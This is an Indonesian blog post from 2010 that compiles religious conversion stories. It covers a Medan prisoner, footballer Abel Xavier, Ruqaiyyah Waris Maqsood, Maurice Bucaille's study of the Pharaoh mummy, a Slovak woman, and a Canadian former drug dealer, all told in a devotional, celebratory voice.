Minggu, 21 November 2010

KISAH PARA MUALLAF

KISAH PARA MUALLAF

Luciana Siahaan: Takjub Suara Azan, Masuk Islam di Dalam Penjara

Di balik musibah pasti ada hikmahnya. Setelah dijebloskan ke penjara dalam suatu kasus, Luciana Siahaan justru mendapat hidayah lalu masuk Islam. Kini ia bercita-cita ingin memperdalam Islam supaya bisa berdakwah.
Seorang narapidana wanita Luciana Siahaan (44) warga Jalan Budi Luhur Medan memutuskan masuk agama Islam dengan mengucapkan dua kalimat syahadat setelah takjub mendengar keindahan suara azan.
“Hati saya merasa senang dan bila mendengar suara azan, sehingga saya tertarik masuk Islam,” ujarnya di Lembaga Pemasyarakatan (Lapas) Wanita Klas I Medan, Kamis malam (26/8/2010).
Luciana Siahaan yang masuk agama Islam itu setelah disyahadatkan oleh Ustadz Tamklid Harahap bertempat di Lapas Wanita Klas I Medan, Kamis malam sekitar pukul 19.00 WIB.
Dalam acara itu turut hadir Kepala Kantor Kementerian Hukum dan HAM Wilayah Sumut Mashudi dan Kepala Lapas Wanita Klas I Medan Yuhelly Yunus dan sejumlah saksi-saksi.
Setelah Luciana Siahaan hijrah masuk agama Islam, maka namanya juga berubah menjadi Siti Khadijah.
Usai acara tersebut, Siti Khadijah Siahaan menjelaskan kepada wartawan, ia tertarik masuk agama Islam sekitar enam bulan lalu, karena bermimpi didatangi lima malaikat dan disuruh menaiki tangga yang sangat tinggi.
Kepada malaikat, ia juga mengatakan tidak mampu menaiki tangga tersebut. Namun malaikat terus menyakinkan dirinya.
Setelah sampai di ujung tangga yang paling tinggi itu, ia mendengar suara azan. Dan mimpi yang dialaminya itu terjadi selama dua minggu berturut-turut.
Selanjutnya ia mengatakan, seminggu sebelum memeluk agama Islam ia sudah belajar membaca Al-Quran dan melaksanakan shalat Tarawih di Lapas Wanita Medan.
“Saya yakin ada hikmahnya masuk Islam pada bulan Ramadhan ini, sekalian untuk memohon ampun dari Allah SWT,” katanya.
Ia juga menjelaskan, tekadnya untuk memeluk agama Islam, merupakan keputusan sendiri tanpa ada paksaan dari pihak lain.
Selain itu, setelah keluar dari masa pembinaan di Lapas Wanita ini, ia nantinya berkeinginan menjadi seorang ustadzah agar bisa berdakwah menyampaikan syiar agama Islam.
Kepala Lembaga Pemasyarakatan Wanita Klas I Medan, Yuhelly Yunus, BcIP SH mengatakan, sempat kaget mendengar keinginan Luciana untuk memeluk agama Islam.
Ia menjelaskan, sebelumnya sempat mempertanyakan keseriusan niat Luciana serta kesiapan menghadapi berbagai cobaan dan tantangan terkait keputusannya itu.
Luciana Siahaan merupakan narapidana kasus penipuan serta penggelapan bibit tanaman seperti rambutan, durian, duku serta langsat sebesar Rp 2 miliar dan divonis 2,5 tahun penjara di PN Medan tahun 2009. [taz/ant]
Disalin dari voice of al -Islam,

Mantan Pemain Liverpool Itu Masuk Islam


Faisal Xavier
Faisal Xavier
Abel Xavier, mantan pemain sepakbola terkenal dari Liverpool memutuskan pensiun dari sepakbola, dan kemudian masuk Islam. Ia pun serta merta mengganti namanya.
Bintang asal Portugal ini mengganti namanya menjadi Faisal Xavier dan akan memulai proyek-proyek kemanusiaan.
Dia terakhir bermain untuk LA Galaxy (Amerka) pada 2008 dan kini telah memutuskan untuk berhenti di dunia sepakbola.
Xavier, 37, bergabung dengan Liverpool dari Everton pada tahun 2002 dan mencetak dua gol dalam 21 penampilan bagi klub Merseyside ini. Selain di Liverpool dan Everton, ia bermain juga di Middlesbrough.
Ia pindah ke klub Major League Soccer LA Galaxy bersama David Beckham.
Xavier berkata: “Ini perpisahan emosional dan saya berharap untuk ikut serta dalam sesuatu yang sangat memuaskan dalam tahap baru hidup saya.
Pada saat-saat sedih, saya telah menemukan kenyamanan dalam Islam. Perlahan-lahan, saya belajar agama yang penuh dengan perdamaian, kesetaraan, kebebasan dan harapan.”
Barokallah, Senhor! (sa/football.uk)

Rosalyn Rushbrook Seorang Sarjana Theologi, Menemukan Kebenaran Islam dari Al-Kitab

Rosalyn 
Rushbrook
Rosalyn Rushbrook
Ia mendapat ijazah di bidang Teologi Kristen. Namun, pengetahuan Kristennya yang begitu mendalam, menjadikan perempuan paruh baya ini mencintai Islam. Rushbrook yang berganti nama Ruqaiyyah Waris Maqsood setelah memeluk Islam, merupakan salah satu penulis buku-buku Islam paling produktif. Puluhan buku berkenaan dengan Islam telah ditulis oleh perempuan kelahiran London, Inggris, tahun 1942 ini. Buku-bukunya termasuk best seller dan menjadi referensi serta rujukan di berbagai negara.
Jauh sebelum berpaling ke Islam, Ruqaiyyah lahir dan dibesarkan dalam lingkungan Kristen Protestan. Nama asalnya ialah Rosalyn Rushbrook. Dia memperoleh ijazah dalam bidang Teologi Kristen dari Universitas Hull, Inggris, tahun 1963, dan master bidang pendidikan dari tempat yang sama pada tahun 1964. Selama hampir 32 tahun, dia mengelola program studi ilmu-ilmu keagamaan di berbagai sekolah dan perguruan tinggi di Inggris. Dia juga sempat menjabat sebagai kepala Studi Agama di William Gee High School, Hull, Inggris.
Pengetahuan Kristennya yang begitu mendalam, membuatnya menulis beberapa buah buku tentang Kristen. Namun, siapa yang bisa menyangka jika pengetahuannya yang begitu mendalam tentang Kristen pulalah yang menyadarkannya. Dia mendapati ajaran Kristen yang diyakininya selama ini telah banyak menyimpang, terutama yang berkaitan dengan konsep ketuhanan.
Dengan pengetahuan yang dimilikinya, Ruqaiyyah bergerak atas inisiatif sendiri mencari kebenaran berdasarkan kajian-kajian ilmiahnya, termasuk mempelajari Alkitab. Namun, akhirnya dia meninggalkan agamanya itu setelah bergulat bertahun-tahun dalam pencarian atas pertanyaan-pertanyaannya tentang konsep teologi Trinitas. Dia tak menemukan apa-apa. Akhirnya tahun 1986, di saat usianya menginjak 44 tahun, Ruqaiyyah memutuskan untuk memeluk Islam.
Ruqaiyyah memeluk Islam murni berdasarkan latar belakang pengetahuannya dan kajian mendalam tentang ajaran ketuhanan, baik dalam Islam dan Kristen. Seperti kebanyakan mualaf lainnya, dia menyebut dirinya telah ‘kembali’ dengan menjadi Muslim. Kini, dia memperjuangkan Islam lewat tulisan dan buku-bukunya.
Dalam wawancara dengan sebuah media, dia ditanya perihal konsep Islam tentang Nabi Isa yang dalam ajaran Kristen disebut Yesus. “Dinegara Barat, ada ajaran ilmu etika berinti pada cinta dan kasih Tuhan dan tolong-menolong sesama manusia. Itu semua diajarkan juga oleh semua nabi, termasuk Nabi Muham mad SAW. Kami orang Islam juga me yakini Nabi Isa sebagai salah satu nabi yang diutus Allah,” kata Ruqaiyyah.
Keputusan Ruqaiyyah untuk berpindah keyakinan membawa konsekuensi pada kehidupan rumah tangganya. Ia memutuskan untuk mengakhiri biduk perkawinannya dengan penyair Inggris George Morris Kendrick yang telah dijalaninya sejak 1964. Dari perkawinannya dengan George, mereka memiliki dua orang anak, Daniel George lahir 1968 dan Frances Elisabeth Eva lahir 1969. Kemudian di tahun 1990, dia menikah lagi dengan pria keturunan Pakistan, Waris Ali Maqsood.
Berdakwah lewat tulisan Selepas hijrah ke Islam, tidak membuat Ruqaiyyah berhenti menulis. Justru sebaliknya, ia menjadi semakin produktif. Lebih dari 30 buku mengenai Islam telah ia tulis. Saat ini dia memiliki sembilan buah buku yang masih dalam proses penerbitan. Dia juga menulis berbagai artikel di majalah maupun koran yang berkaitan dengan Islam dan Muslim.
“Saat ini Islam dicap sebagai agama bermasalah. Sangat tidak adil. Karena itu, saya berupaya menulis untuk memperbanyak literatur-literatur Islam. Harap an saya, agar melalui tulisan-tulisan itu, dapat membantu memperbaiki atmosfer yang kurang berpihak ke Islam,” cetusnya.
Buku-buku mengenai Islam yang ditulisnya cukup beragam. Tidak ha nya buku-buku kategori ‘berat’, seperti buku mengenai sejarah Islam dan isu seputar Muslimah, tetapi juga buku-buku tentang bimbingan konseling bagi remaja Islam. Juga ada beberapa buku saku, antara lain A Guide for Visitors to Mosques, a Marriage Gui dance Booklet, Muslim Women’s Helpline.
Saya sangat tertarik menggeluti sejarah Islam, terutama tentang kehidupan wanita-wanita di sekitar Nabi Muhammad. Saya acapkali mengcounter kampanye anti-Islam yang mendiskreditkan wanita Muslim.
Oleh komunitas Muslim di Inggris, ia juga diminta untuk menyusun buku teks mengenai Islam. Buku-buku teks hasil karyanya ini dipakai secara luas di Inggris selama hampir 20 tahun. Buku-buku itu dipakai oleh kalangan pribadi, mualaf, dan pelajar-pelajar sekolah umum dan madrasah di Inggris dan beberapa negara lainnya.
Ia juga membantu mengembangkan silabus bagi pelajar sekolah agama, bekerja sama dengan dinas pendidikan setempat. Silabusnya tergolong unik, dibuat khusus agar pelajar mandiri. Jadi, tanpa guru atau fasilitas tetap bisa jalan. Silabusnya dirancang untuk pelajar sekolah dasar hingga perguruan ting gi. Menariknya lagi, buku itu bisa dipakai untuk pendidikan formal, nonformal, misalnya di rumah, bahkan juga di penjara. Ruqaiyyah kini juga aktif menjadi tutor jarak jauh (distance learning) untuk Asosiasi Peneliti Muslim (AMR) adalah aktivitas lain nya.
Aktivitas mengajarnya juga padat. Banyak negara telah disambanginya, di antaranya AS, Kanada, Denmark, Swedia, Finlandia, Irlandia, dan Singapura. Ruqaiyyah juga mengajar di beberapa universitas yang ada di Inggris, seperti Oxford, Cambridge, Glasgow, dan Manchester. Juga, mengajar di School of Oriental and Arabic Studies di London.
Ruqaiyyah menerima Muhammad Iqbal Award tahun 2001 atas kreativitas dan jasanya, dalam mengembang kan metodologi pengajaran Islam. Dialah muslim pertama Inggris yang pernah menerima anugerah bergengsi tersebut. Tak hanya itu, pada Maret 2004 Ruqaiyyah terpilih sebagai salah satu dari 100 wanita berprestasi di dunia. Dalam ajang pemilihan Daily Mails Real Women of Achievement, Ruqaiyyah Waris Maqsood termasuk satu dari tujuh orang wanita berprestasi dalam kategori keagamaan. dia/taq/berbagai sumber
Nama Muslim : Ruqaiyyah Waris Maqsood
Nama asli : Rosalyn Rushbrook
Lahir : 1942
Masuk Islam : 1986
PENGHARGAAN:
1. News Awards for Excellence (2001)
2. Muhammad Iqbal Award (2004)
3. Salah satu dari tujuh pemenang Daily Mail’s Real Women of Achievement.
4. Salah satu dari empat penerima Perdamaian Global dan Kesatuan Lifetime Achievement Award (2008).
Sumber : Disini
Sumber Asli : republika online

Maurice Bucaille Membuktikan Kebenaran AL-Qur’an

Penelitiannya tentang Mumi Firaun membawanya pada kebenaran Alquran.
Mummy
Mummy
Suatu hari di pertengahan tahun 1975, sebuah tawaran dari pemerintah Prancis datang kepada pemerintah Mesir. Negara Eropa tersebut menawarkan bantuan untuk meneliti, mempelajari, dan menganalisis mumi Firaun. Tawaran tersebut disambut baik oleh Mesir. Setelah mendapat restu dari pemerintah Mesir, mumi Firaun tersebut kemudian digotong ke Prancis. Bahkan, pihak Prancis membuat pesta penyambutan kedatangan mumi Firaun dengan pesta yang sangat meriah.
Mumi itu pun dibawa ke ruang khusus di Pusat Purbakala Prancis, yang selanjutnya dilakukan penelitian sekaligus mengungkap rahasia di baliknya oleh para ilmuwan terkemuka dan para pakar dokter bedah dan otopsi di Prancis. Pemimpin ahli bedah sekaligus penanggung jawab utama dalam penelitian mumi ini adalah Prof. Dr. Maurice Bucaille.
Murice Bucaille
Murice Bucaille
Bucaille adalah ahli bedah kenamaan Prancis dan pernah mengepalai klinik bedah di Universitas Paris. Ia dilahirkan di Pont-L’Eveque, Prancis, pada 19 Juli 1920. Bucaille memulai kariernya di bidang kedokteran pada 1945 sebagai ahli gastroenterology. Dan, pada 1973, ia ditunjuk menjadi dokter keluarga oleh Raja Faisal dari Arab Saudi.
Tidak hanya anggota keluarga Raja Faisal yang menjadi pasiennya. Anggota keluarga Presiden Mesir kala itu, Anwar Sadat, diketahui juga termasuk dalam daftar pasien yang pernah menggunakan jasanya.
Namanya mulai terkenal ketika ia menulis buku tentang Bibel, Alquran, dan ilmu pengetahuan modern atau judul aslinya dalam bahasa Prancis yaitu La Bible, le Coran et la Science di tahun 1976.
Ketertarikan Bucaille terhadap Islam mulai muncul ketika secara intens dia mendalami kajian biologi dan hubungannya dengan beberapa doktrin agama. Karenanya, ketika datang kesempatan kepada Bucaille untuk meneliti, mempelajari, dan menganalisis mumi Firaun, ia mengerahkan seluruh kemampuannya untuk menguak misteri di balik penyebab kematian sang raja Mesir kuno tersebut.
Ternyata, hasil akhir yang ia peroleh sangat mengejutkan! Sisa-sisa garam yang melekat pada tubuh sang mumi adalah bukti terbesar bahwa dia telah mati karena tenggelam. Jasadnya segera dikeluarkan dari laut dan kemudian dibalsem untuk segera dijadikan mumi agar awet.
Penemuan tersebut masih menyisakan sebuah pertanyaan dalam kepala sang profesor. Bagaimana jasad tersebut bisa lebih baik dari jasad-jasad yang lain, padahal dia dikeluarkan dari laut?
Prof Bucaille lantas menyiapkan laporan akhir tentang sesuatu yang diyakininya sebagai penemuan baru, yaitu tentang penyelamatan mayat Firaun dari laut dan pengawetannya. Laporan akhirnya ini dia terbitkan dengan judul Mumi Firaun; Sebuah Penelitian Medis Modern, dengan judul aslinya, Les momies des Pharaons et la midecine. Berkat buku ini, dia menerima penghargaan Le prix Diane-Potier-Boes (penghargaan dalam sejarah) dari Academie Frantaise dan Prix General (Penghargaan umum) dari Academie Nationale de Medicine, Prancis.
Terkait dengan laporan akhir yang disusunnya, salah seorang di antara rekannya membisikkan sesuatu di telinganya seraya berkata: ”Jangan tergesa-gesa karena sesungguhnya kaum Muslimin telah berbicara tentang tenggelamnya mumi ini”. Bucaille awalnya mengingkari kabar ini dengan keras sekaligus menganggapnya mustahil.
Menurutnya, pengungkapan rahasia seperti ini tidak mungkin diketahui kecuali dengan perkembangan ilmu modern, melalui peralatan canggih yang mutakhir dan akurat.
Hingga salah seorang di antara mereka berkata bahwa Alquran yang diyakini umat Islam telah meriwayatkan kisah tenggelamnya Firaun dan kemudian diselamatkannya mayatnya.
Ungkapan itu makin membingungkan Bucaille. Lalu, dia mulai berpikir dan bertanya-tanya. Bagaimana mungkin hal itu bisa terjadi? Bahkan, mumi tersebut baru ditemukan sekitar tahun 1898 M, sementara Alquran telah ada ribuan tahun sebelumnya.
Ia duduk semalaman memandang mayat Firaun dan terus memikirkan hal tersebut. Ucapan rekannya masih terngiang-ngiang dibenaknya, bahwa Alquran–kitab suci umat Islam–telah membicarakan kisah Firaun yang jasadnya diselamatkan dari kehancuran sejak ribuan tahun lalu.
Sementara itu, dalam kitab suci agama lain, hanya membicarakan tenggelamnya Firaun di tengah lautan saat mengejar Musa, dan tidak membicarakan tentang mayat Firaun. Bucaille pun makin bingung dan terus memikirkan hal itu.
Ia berkata pada dirinya sendiri. ‘‘Apakah masuk akal mumi di depanku ini adalah Firaun yang akan menangkap Musa? Apakah masuk akal, Muhammad mengetahui hal itu, padahal kejadiannya ada sebelum Alquran diturunkan?”
Prof Bucaille tidak bisa tidur, dia meminta untuk didatangkan Kitab Taurat (Perjanjian Lama). Diapun membaca Taurat yang menceritakan: ”Airpun kembali (seperti semula), menutupi kereta, pasukan berkuda, dan seluruh tentara Firaun yang masuk ke dalam laut di belakang mereka, tidak tertinggal satu pun di antara mereka”.
Kemudian dia membandingkan dengan Injil. Ternyata, Injil juga tidak membicarakan tentang diselamatkannya jasad Firaun dan masih tetap utuh. Karena itu, ia semakin bingung.
Berikrar Islam
Setelah perbaikan terhadap mayat Firaun dan pemumiannya, Prancis mengembalikan mumi tersebut ke Mesir. Akan tetapi, tidak ada keputusan yang mengembirakannya, tidak ada pikiran yang membuatnya tenang semenjak ia mendapatkan temuan dan kabar dari rekannya tersebut, yakni kabar bahwa kaum Muslimin telah saling menceritakan tentang penyelamatan mayat tersebut. Dia pun memutuskan untuk menemui sejumlah ilmuwan otopsi dari kaum Muslimin.
Dari sini kemudian terjadilah perbincangan untuk pertama kalinya dengan peneliti dan ilmuwan Muslim. Ia bertanya tentang kehidupan Musa, perbuatan yang dilakukan Firaun, dan pengejarannya pada Musa hingga dia tenggelam dan bagaimana jasad Firaun diselamatkan dari laut.
Maka, berdirilah salah satu di antara ilmuwan Muslim tersebut seraya membuka mushaf Alquran dan membacakan untuk Bucaille firman Allah SWT yang artinya: ”Maka pada hari ini kami selamatkan badanmu supaya kamu dapat menjadi pelajaran bagi orang-orang yang datang sesudahmu dan sesungguhnya kebanyakan dari manusia lengah dari tanda-tanda kekuasaan Kami.” (QS Yunus: 92).
Ayat ini sangat menyentuh hati Bucaille. Ia mengatakan bahwa ayat Alquran tersebut masuk akal dan mendorong sains untuk maju. Hatinya bergetar, dan getaran itu membuatnya berdiri di hadapan orang-orang yang hadir seraya menyeru dengan lantang: ”Sungguh aku masuk Islam dan aku beriman dengan Alquran ini”.
Ia pun kembali ke Prancis dengan wajah baru, berbeda dengan wajah pada saat dia pergi dulu. Sejak memeluk Islam, ia menghabiskan waktunya untuk meneliti tingkat kesesuaian hakikat ilmiah dan penemuan-penemuan modern dengan Alquran, serta mencari satu pertentangan ilmiah yang dibicarakan Alquran.
Semua hasil penelitiannya tersebut kemudian ia bukukan dengan judul Bibel, Alquran dan Ilmu Pengetahuan Modern, judul asli dalam bahasa Prancis, La Bible, le Coran et la Science. Buku yang dirilis tahun 1976 ini menjadi best-seller internasional (laris) di dunia Muslim dan telah diterjemahkan ke hampir semua bahasa utama umat Muslim di dunia.
Karyanya ini menerangkan bahwa Alquran sangat konsisten dengan ilmu pengetahuan dan sains, sedangkan Al-Kitab atau Bibel tidak demikian. Bucaille dalam bukunya mengkritik Bibel yang ia anggap tidak konsisten dan penurunannya diragukan.
Download La Bible, le Coran et la Science Bahasa Indonesia :
La Bible, Le Coran et la Science
La Bible, Le Coran et la Science

Referensi :
SyiarIslam
dia/sya/berbagai sumber

Terpikat Suara Azan, Tatiana Pilih Islam

Gadis asal Slowakia itu terbuka hatinya kepada Islam selepas mendengar suara azan kala berkunjung ke Kairo, Mesir. “Ketika mendengar suara azan, jujur saja, saya merasakan getaran-getaran aneh dalam hati. Ketika itu saya seakan terhipnotis dan tak mendengar suara lain kecuali suara yang berkumandang melalui menara mesjid itu,” akunya. Sekembalinya ke Slowakia dia memperdalam Islam dengan dibantu Muslimah di sana . Bahkan internet juga sangat membantunya dalam mengenal Islam. Alhasil, dia pun memeluk Islam dan kini menjalani hari-hari yang dikatakannya sebagai begitu indah dan nikmat terasa. Itulah Tatiana Fatimah, yang kami rangkum dari beberapa situs.
“Sejuta kata-kata tak cukup untuk mengekspresikan bagaimana kecintaan saya kepada Allah. Inilah yang saya rasakan saat ini. Islam ibarat darah yang mengalir di sekujur tubuh hingga ke ujung jari saya. Ketika bercakap-cakap dengan Allah di dalam shalat, sangat indah,” kata Tatiana. (watch the miracle of Adzan )
“Saya berterima kasih kepada Allah SWT atas hadiah yang sangat berharga ini, yakni menjadikan saya sebagai seorang Muslim. Sepanjang hidup kini hanya untuk memuji dan mensyukuri nikmat-Nya,” kata dia lagi.
Suka traveling
Sebelum seperti sekarang, perjalanan Tatiana menuju Islam cukup sederhana dan tidak melewati jalan yang rumit. Kadang dia mengaku sering tersenyum sendiri jika ingat perkenalan pertamanya dengan Islam. “Traveling adalah kesukaan saya. Kami sering bepergian sekeluarga dengan berkunjung ke berbagai negara. Negara-negara Muslim telah banyak pula jadi tempat liburan kami,“ akunya.
“Mesir merupakan negara terakhir yang pernah kami kunjungi. Budaya dan segala rupa keunikan masyarakatnya sangat berkesan di hati,“ kenangnya. Di sana pula pertama kali Tatiana bersentuhan secara dekat dengan mesjid. Namun waktu ke sana dia belum sempat masuk ke dalamnya. “Waktu itu saya mengira, karena bukan Muslim, dilarang masuk ke dalam mesjid,“ katanya.
“Tapi jujur saya katakan, ketika mendengar suara azan, saya merasakan getaran-getaran aneh dalam hati,“ aku dia. Ketika itu Tatiana seakan terhipnotis dan tak mendengar suara lain kecuali suara yang berkumandang melalui menara mesjid. Dia benar-benar terpikat dengan suara azan. “Yang lebih berkesan lagi adalah tatkala melihat orang-orang yang berkumpul di dalam mesjid, penuh dengan kesan kesatuan dan kasih sayang dikala mendirikan shalat. Hal itu hingga kini masih sangat berbekas dalam ingatan saya,“ katanya lagi.
Tertarik bahasa Arab
“Oya saat itu saya tidak banyak tahu tentang Islam. Sama sekali nol. Berbanding terbalik dengan apa yang telah saya ketahui hari ini,“ kata dia. Tatiana masih ingat, waktu ketika kembali dari Kairo, dia sangat tertarik sekali belajar bahasa Arab. “Secara tiba-tiba bahasa Arab menjadi salah satu bahasa yang paling indah di dunia,“ tukasnya. Sayangnya di kota tempat Tatiana tinggal tidak ada kursus yang menyelenggarakan bahasa Arab. Kala itu cuma ada bahasa Inggris dan Jerman.
Pernah pihak sekolah berencana membuka kelas bahasa Arab. Tapi dibatalkan. “Waktu itu mau masuk puasa Ramadhan. Rupanya sang guru yang berasal dari Arab, mau pulang liburan ke kampung halamannya. Makanya dibatalkan. Tentu saja saya kecewa berat,“ sambung Tatiana.
Beberapa lama dia vakum dari mempelajari bahasa Arab. Namun dia mengaku memang sangat “haus” untuk mempelajari Islam dan bahasa Arab secara lebih mendalam. “Tak lama saya mulai belajar Islam lagi, secara perlahan. Mulai dari awal sekali. Belajar melalui internet. Berbagai website tentang Islam saya telusuri. Begitu juga semua chanel di TV yang menyajikan acara tentang Islam dan Muslim tak pernah saya lewati,” tuturnya. Dia juga ikut sebuah forum khusus untuk wanita via internet. Ya melalui internet Tatiana banyak belajar Islam.
Ikut kelas Al-Quran
Ada juga beberapa warga Muslim Slowakia yang membantunya dalam memahami Islam. Pernah satu ketika seorang Muslimah asal Kosice memberitahukan akan ada kelas bahasa Arab dan Alquran. Kosice merupakan sebuah region di Slowakia yang memiliki luas wilayah 6.753 km² dan populasi penduduk 766.012 jiwa. “Muslimah itu cukup saya kenal wajahnya sebab sering tampil di acara talk show menceritakan tentang Islam dan Muslim,” kenangnya.
“Saya tentu saja tak menyia-nyiakan kesempatan itu dan segera mengirim email kepadanya memberitahukan keikutsertaan saya. Kami ketemu sepekan kemudian. Bukan main. Orangnya sangat ramah dan santun sekali. Wajahnya memancarkan kedamaian,” aku Tatiana lagi.
Satu sifat Tatiana, yakni dia selalu berprasangka baik terhadap orang lain. Jadi tak sulit baginya untuk belajar sesuatu yang baru. Tak ada rasa takut tentang die\sebut teroris, misalnya. “Saya belajar dari siapa saja. Saya hadir bersama rekan Muslimah tersebut ke kelas bahasa Arab. Tak berapa lama saya punya banyak kenalan baru. Saya hadir secara rutin dan sangat menikmati kelas Alquran,” katanya. Ketika itu dia belum masuk Islam lagi, namun tak menghalanginya untuk belajar Quran. Semua yang ada di kelas sangat respek dan membantu setiap kesulitan yang dihadapinya.
Selepas beberapa bulan kemudian kelas bahasa Arab berakhir. Tapi keakraban di antara mereka telah terjalin begitu kental. “Kami sering bertemu. Bahkan sering kami diskusi berjam-jam lamanya. Bagi saya hal itu sangat membantu untuk mengenal kehidupan Islam lebih dalam,” imbuh dia.
Waktu itu Tatiana masih ragu-ragu, antara masuk Islam dan tidak. “Saya masih menghadapi dilema soal itu. Tapi batin saya mengatakan itu bukan hal krusial. Yang paling penting sekarang adalah belajar mengenal dan mencintai Tuhan (Allah).
Saya bertanya kepada kawan-kawan Muslimah lainnya, kapan waktu yang tepat (untuk masuk Islam). Mereka secara diplomatis menjawab bahwa tanda itu nanti akan datang dengan sendirinya. Mereka menyebutnya dengan hidayah Allah.”
Keluarga Tatiana berlatar belakang Kristen Katolik. Namun dia mengaku tak ada seorang pun yang membimbingnya belajar agama. Praktis sejak kecil dia tak menganut agama apapun. “Ibu memberikan kebebasan bagi saya untuk memilih keyakinan. Dia tak memaksa. Semua terserah saya. Keluarga saya bahkan tak pernah pergi ke gereja,” katanya berterus terang Namun Tatiana mengaku, di antara anggota keluarga yang lain dialah yang lebih “alim”. “Saya merasa Tuhan itu ada dan dekat sekali.”
Waktu berlalu dan semuanya berjalan biasa saja, tak ada kejutan yang berarti. Saban hari Tatiana berdoa supaya Tuhan beri petunjuk kepadanya untuk jadi seorang Muslim.
Debar aneh
Pas musim panas Tatiana menghabiskan waktu liburannya di rumah nenek. Selepas liburan dan kembali ke rumah dia merasakan sesuatu yang lain dalam hati. Sesuatu yang amat “spesial“ itu hadir secara tiba-tiba. Spontan Tatiana teringat dengan kata-kata teman Muslimahnya:”Satu saat kamu akan dapatkan petunjuk dari-Nya.“
“Entah mengapa saya persis seorang anak kecil yang baru mendapatkan sesuatu. Mendadak saya merasakan gairah yang hebat untuk segera menjadi seorang Muslim. Tuhan serasa membimbing saya,” aku dia. Tatiana benar-benar ingin segera dekat dengan Yang Kuasa.
Dia percaya kebenaran telah datang. Allah telah kirimkan kepadanya. Tekad Tatiana sudah bulat. Dia tidak ragu-ragu lagi untuk memeluk Islam. “Saya yakin pilihan saya benar adanya. Jika Anda tanya kenapa, saya tak mampu menjawabnya. Tapi saya yakin dengan sinyal ini,” tukas Tatiana.
Bersyahadah
Tatiana memberitahukan rekan Muslimah yang pertama kali membimbingnya. “Tak berapa lama saya pun bersyahadah. Rekan-rekan memeluk saya dengan penuh kasih sayang. Saya merasa seperti “orang baru” di dunia ini. Seperti dilahirkan kembali. Menurut Alquran semua dosa-dosa masa lalu dihapuskan. Bak kain putih, tak ada noda lagi. Saya sudah siap untuk menjalani kehidupan baru ini,” kenangnya.
Pada awal keislaman, dia semakin banyak bertanya terutama hal-hal yang prinsipil dalam Islam. “Saya ingin tahu apa saja, dari nol. Jujur saja, keinginan untuk belajar sangat menggelegak ketika itu. Islam benar-benar telah “membangunkan” kehidupan baru bagi saya. Saya inginnya mendapat semua informasi, dari hukum-hukum hingga sejarah Islam dan bermaksud meneruskannya ke koleganya yang lain,” kata dia penuh obsesi.
“Contekan” shalat
“Oya usaha pertama saya untuk shalat sangat amatiran sekali. Tapi semuanya benar-benar keluar dari hati, bukan paksaan,” kenang dia. Ketika baru pertamakali belajar, dia menulis semua tatacara shalat di secarik kertas. Begitu juga dengan ayat Alquran, ditulisnya di secarik kertas. Jadi dia membaca “contekan“ di kertas tersebut sembari shalat. Bukan main. “Tahu tidak, sekitar tiga minggu kemudian saya sudah bisa mengerjakan shalat tanpa bantuan kertas itu lagi,” ujarnya senang.
“Saya selalu berdoa kepada Allah agar dimudahkan dalam belajar Islam,” tukasnya. “Islam agama yang sangat indah, “ kata dia lagi.
Di akhir penuturannya, dia berharap dapat terus dekat dengan Allah dan melakukan segala hal semata-mata karena perintah-Nya. “Menghindari larangannya, lalu memperlihatkan dan memberi contoh budi pekerti yang baik kepada orang lain. Hanya dengan cara itu kita bisa tunjukkan Islam yang sebenarnya,” tutupnya. [Zulkarnain Jalil/hidayatullah.com]

Kisah Pemadat Bule Masuk Islam

Seorang pemuda Kanada lahir dari sepasang suami isteri Kanada yang peduli dengan agama. Ketika menginjak usia sebelas tahun ia serius membandingkan berbagai agama yang ada karena ia merasa tidak puas dengan agama asalnya, yaitu Kristen. Semua agama ia pertanyakan, kecuali Islam. Ia samasekali tidak tertarik mempelajari Islam karena opininya begitudalam terformat bahwa Islam merupakan agama kegelapan. Menurutnya Islam merupakan agama para teroris sebagaimana yang selama ini dikesankan oleh media Barat pada umumnya.
Namun sayang, belum sampai ke penghujung perjalanan ruhaninya, keburu sebuah tragedi menimpa keluarganya. Ayah dan ibunya bercerai. Ayahnya pergi meninggalkan anak-isterinya. Sedangkan ibunya terperosok ke dalam lembah hitam narkoba. Dalam keadaan seperti itu si anak muda inipun terbawa menjadi seorang pemadat.
Awalnya ia hanya menjadi seorang pengguna. Namun dengan berjalannya waktu ia naik pangkat dan akhirnya menjadi pengedar di samping pengguna. Dan tidak lama kemudian ia bahkan menjadi salah seorang pimpinan jaringan narkoba papan atas di Kanada.
Saat ia mencapai karir tertingginya di dunia gelap jaringan narkoba, iapun tertangkap dan akhinya berurusan dengan polisi. Ia sempat masuk penjara selama empat tahun.
Setelah menjalani masa tahanannya, begitu keluar iapun segera mengunjungi salah satu pangkalan favorit tempat para pemadat biasa berkumpul. Maka mulailah iapun menikmati suasana ”fly” dengan narkobanya. Saat ia sedang sakau itulah ia duduk di samping seorang pemuda keturunan Maroko yang dilihatnya agak berbeda saat melinting rokoknya. Iapun bertanya: ”Anda berasal dari mana? Kok anda melinting rokok berbeda dengan kebanyakan orang di sini?” Pemuda itu menjawab: ”Inilah kebiasaan orang di negeri saya ketika melinting rokok.”
”Anda berasal dari mana?”
”Saya berasal dari Afrika Utara, dari Maroko. Itulah negeri nenek-moyang saya.”
”Kalau begitu anda seorang muslim ya?”
” Iya benar, saya seorang muslim dari Maroko.”
Maka sambil keduanya tenggelam dalam narkobanya masing-masing, mulailah keduanya terlibat dalam sebuah dialog panjang-lebar seputar agama Islam. Si pemuda Kanada menanyakan berbagai hal mengenai agama Islam, sementara si pemuda keturunan Maroko menjawab sebatas pengetahuannya. Ternyata dialog mereka berlangsung terus sampai keduanya kehabisan narkoba. Tanpa disadari keduanya telah ngobrol seputar Islam selama tidak kurang dua jam di tempat mangkalnya para pemadat.
Tapi si pemuda Kanada masih belum puas. Masih banyak pertanyaan yang mengganjal. Sedangkan si pemuda Maroko sudah kehabisan pengetahuan yang ia miliki seputar Islam. Tiba-tiba datang pemuda ketiga yang ternyata berasal dari keturunan Aljazair ikut terlibat dalam perbincangan seputar Islam itu. Maka perbincangan seputar Islam dilanjutkan dengan narasumbernya beralih kepada si pemuda Aljazair. Namun pada saat-saat tertentu kadang terjadi perselisihan pendapat antara si pemuda Aljazair dengan si pemuda Maroko. Ini wajar. Karena dalam sejarah Islam bahkan perpedaan pendapat antara para ulama saja sering dijumpai, apalagi antara sesama orang awam ilmu agama. Sesi kedua ”seminar” berakhir dua jam berikutnya.
Ternyata bermula dari perbincangan soal Islam di pangkalan para pemadat, si pemuda Kanada alhasil memperoleh hidayah iman dan Islam. Iapun mengikrarkan dua kalimat syahadat.
